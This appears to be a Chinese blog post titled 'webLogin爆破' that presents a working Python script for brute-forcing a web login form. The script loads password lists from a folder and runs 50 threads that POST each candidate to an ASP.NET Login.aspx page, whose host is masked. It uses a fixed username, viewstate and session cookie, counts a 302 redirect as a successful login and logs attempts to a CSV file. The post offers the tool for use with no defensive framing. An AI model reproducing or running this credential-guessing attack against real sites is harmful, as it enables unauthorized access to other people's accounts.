webLogin爆破

#coding=utf-8
import queue
import threading
import csv
import time

import os

import re
import requests

PASSWORDDIR =os.getcwd()+"\\PasswordDir"
mPasswordQueue = queue.Queue()  # 存放密码的队列

class MyThread(threading.Thread):
    def __init__(self, func):
        threading.Thread.__init__(self)
        self.func = func
    def run(self):
        self.func()

def do_work():
    while True:#不要使用 while not out_queue.empty():
        password=mPasswordQueue.get()
        #TODO
        result=web_login(password,"用户密码不正确")
        mPasswordQueue.task_done()  # 传入一个相当于完成一个任务
        if result[0]==1 and result[1]==302:
            str_print=("[+]Success:{} {} {} {}".format(result[1], result[2], result[3], result[4]))
            print(str_print)
            break
        else:
            if result[0]==-1:
                mPasswordQueue.put(password)
            str_print =("[-]Fail:{} {} {} {}".format(result[1], result[2], result[3], result[4]))
            print(str_print)
        with open("suceess.csv", "a+", encoding="utf-8",newline='') as f:
            writer = csv.writer(f)
            writer.writerow([result[1], result[2], result[3], result[4]])
            f.close()






def web_login(password,error_password_tips):
    url="http://xxxxxxxxxxxx/Login.aspx"
    header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
               'Accept-Language': 'zh-CN,zh;q=0.9',
               'Cache-Control': 'max-age=0',
               'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
               'Connection': 'keep-alive',
               'Referer': 'http://xxxxxxxxxxxxxx/Login.aspx'
               }

    data="__VIEWSTATE=%2FwEPDwUJNTk5MzkwMTEwD2QWAgIDD2QWAgIGDxAPFgIeB1Zpc2libGVoZGQWAGRkottryBsY1ggu8eeZoJVLs%2FX%2BTBMvQBPzZrNJw6vIEds%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEdAA38pfJWQZqdusZJ0w1r9wEvVK7BrRAtEiqu9nGFEI%2BjB8iHRs8wx0ZsHaVLh4w40eCinihG6d%2FXh3PZm3b5AoMQBz3vgTciq0jjAXrLjCmyWnluaRD6Qd9Og6KeRtbR3Zc1jHnGwsE7K7Ab7Z7ddgMk8XOsz4DupmbdavTQo9Jm9l5DwoD%2BEdmVHWaIrMKl88dBhIQaJG%2BXFYIydigrIZE6pDKHtBNrVQzdCffUUPNz1TkxRDv1DQzRHLO0lOn8x8g1oFPknU2UGjPEOPtnAuV9Oeawen6U0cTWUMuhcyHHRYjLViutcqN30MzShSAVYSw%3D&txtUsername=&txtUserpassword=&txtBigusername=%E6%9D%A8%E5%A9%B7&txtBigpassword={%password%}&btnBiglogin=%E7%99%BB%E5%BD%95&hiddenloginimg=&hiddenmacaddr=&hdhasReturnUrl=&hdDigestID=&hdsnid=&hddogmessage=PFLZFJVA2BP30%2B69F7%2F8"
    fix_data = data.replace("{%password%}", password)
    cookie_list=[{"ASP.NET_SessionId":"335gq1s5j13b4sugk10vryol"}]
    status_code=-1
    content_length=0
    response=""
    try:
        req = requests.post(url, headers=header, data=fix_data, cookies=cookie_list[0])
        response = req.text
        #print(response)
        status_code= req.status_code
        content_length=req.headers['content-length']
    except Exception as e:
        print(str(e))
        return [-1, status_code, content_length, password,"Network connect exception"]
    if re.search(error_password_tips, response) is not None:
        return [0,status_code,content_length,password, "Password is incorrect"]
    return [1,status_code,content_length,password,"???"]


def openFile(passwordFile):
    datas=[]
    f = open(passwordFile, "rb")  # 二进制格式读文件
    while True:
        line = f.readline()
        if not line:
            break
        else:
            try:
                datas.append(line.decode('utf8'))
            except:
                datas.append(str(line))

    return datas




start = time.time()


def main():

    # 都存放到mPasswordQueue队列中
    for file in os.listdir(PASSWORDDIR):
        filePath = os.path.join(PASSWORDDIR,file)
        print("[SCAN]{}".format(filePath))
        datas =openFile(filePath)
        for data in datas:
            mPasswordQueue.put(data.strip("\n"))

    for i in range(50):
        t = MyThread(do_work)  # 线程任务就是将网址的源代码存放到out_queue队列中
        t.setDaemon(True)  # 设置为守护线程
        t.start()

    print ("mPasswordQueue: %d" % mPasswordQueue.qsize())

    mPasswordQueue.join()  # 线程依次执行,主线程最后执行



main()
print ("Total time :%s" % (time.time() - start))

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值